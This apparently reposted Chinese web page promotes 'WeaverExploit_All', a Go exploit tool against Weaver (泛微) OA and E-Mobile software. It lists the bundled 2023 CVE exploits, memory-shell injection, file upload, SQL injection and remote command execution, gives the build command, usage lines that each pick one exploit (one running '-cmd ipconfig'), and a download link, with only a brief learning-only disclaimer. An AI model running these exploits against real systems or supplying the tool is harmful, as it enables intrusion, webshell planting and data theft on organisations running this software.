泛微最近的漏洞利用工具

WeaverExploit_All

0x01 介绍

泛微最近的漏洞利用工具(PS:2023)

集成了QVD-2023-5012、CVE-2023-2523、CVE-2023-2648、getloginid_ofsLogin 漏洞利用

新增:WorkflowServiceXml 内存马注入、uploaderOperate文件上传漏洞、DeleteUserRequestInfoByXml 、FileDownloadForOutDocSQL注入、E-Mobile 6.0 命令执行漏洞检测

0x02 编译使用

go build -o WeaverExloit-All.exe .\main.go

0x03 使用方法

默认全部poc

WeaverExloit-All.exe --target http://127.0.0.1:8080/WeaverExloit-All.exe --target http://127.0.0.1:8080/ --poc QVD-2023-5012WeaverExloit-All.exe --target http://127.0.0.1:8080/ --poc CVE-2023-2523WeaverExloit-All.exe --target http://127.0.0.1:8080/ --poc CVE-2023-2648WeaverExloit-All.exe --target http://127.0.0.1:8080/ --poc getloginid_ofsLoginWeaverExloit-All.exe --target http://127.0.0.1:8080/ --poc DeleteUserRequestInfoByXmlWeaverExloit-All.exe --target http://127.0.0.1:8080/ --poc WorkFlowServiceXmlWeaverExloit-All.exe --target http://127.0.0.1:8080/ --poc UploaderOperateWeaverExloit-All.exe --target http://127.0.0.1:8080/ --poc FileDownloadForOutDocSQLWeaverExloit-All.exe --target http://127.0.0.1:8080/ --poc E_Mobile_client  -cmd ipconfig

图片

图片

泛微最近的漏洞利用工具_第1张图片

泛微最近的漏洞利用工具_第2张图片

泛微最近的漏洞利用工具_第3张图片

0x04 仅供测试使用

免责声明:本工具不得用于商业用途,仅做学习交流,如用作他途造成的一切后果请自行承担!

0x05 工具下载地址泛微最近的漏洞利用工具icon-default.png?t=N6B9https://mp.weixin.qq.com/s/nKf0SJlrEZ7O7_XXYy3NWg

你可能感兴趣的:(安全工具,渗透测试,网络安全,web安全,测试工具)